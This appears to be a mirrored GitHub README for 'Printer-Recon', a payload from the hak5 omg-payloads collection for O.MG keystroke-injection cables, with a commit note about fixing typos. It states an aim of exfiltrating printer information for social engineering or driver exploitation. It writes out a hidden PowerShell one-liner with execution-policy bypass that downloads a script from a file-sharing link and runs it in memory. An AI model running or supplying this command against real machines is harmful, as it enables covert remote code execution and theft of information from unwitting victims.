mirror of https://github.com/hak5/omg-payloads.git
4a0fdf22c3
There are many payloads in the repo that do not run due to compiler errors (mostly typos, but a few commands that do not exist on O.MG devices). Fixing those errors, along with implementing minor changes such as using STRINGLN in place of STRING and ENTER, or DEFAULT_DELAY in place of DELAY 200 on every other line for improved readability. No content of these scripts has been altered, and I do not intend to run them to validate that they work as intended on their target operating systems. |
||
---|---|---|
.. | ||
PR.ps1 | ||
README.md | ||
payload.txt |
README.md
Table of Contents
Printer-Recon
Description
This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
Getting Started
Dependencies
- DropBox or other file sharing service - Your Shared link for the intended file
- Windows 10
Executing program
- Plug in your device
- Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
Version History
- 0.1
- Initial Release